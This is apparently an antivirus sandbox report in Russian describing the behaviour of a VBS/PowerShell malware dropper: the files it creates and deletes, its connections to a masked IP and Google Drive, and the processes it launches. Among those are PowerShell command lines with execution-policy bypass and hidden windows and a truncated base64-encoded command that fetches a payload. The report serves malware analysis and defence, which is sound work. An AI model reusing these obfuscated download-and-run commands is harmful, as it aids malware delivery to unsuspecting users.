Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\nt0dv3ax.0.cs
- %TEMP%\nt0dv3ax.cmdline
- %TEMP%\nt0dv3ax.out
- %TEMP%\cscc0af.tmp
- %TEMP%\resc0b0.tmp
- %TEMP%\nt0dv3ax.dll
- %APPDATA%\seemethebestthingswithgreatneedswithgo.vbs
Удаляет следующие файлы
- %TEMP%\resc0b0.tmp
- %TEMP%\cscc0af.tmp
- %TEMP%\nt0dv3ax.cmdline
- %TEMP%\nt0dv3ax.pdb
- %TEMP%\nt0dv3ax.dll
- %TEMP%\nt0dv3ax.out
- %TEMP%\nt0dv3ax.0.cs
Сетевая активность
Подключается к
- '19#.#6.178.151':80
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
TCP
Запросы HTTP GET
- http://19#.#6.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
UDP
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\seemethebestthingswithgreatneedswithgo.vbs"
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "poweRSheLl.EXe -eX byPASS -noP -W ... (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nt0dv3ax.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC0B0.tmp" "%TEMP%\CSCC0AF.tmp" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQ... (со скрытым окном)
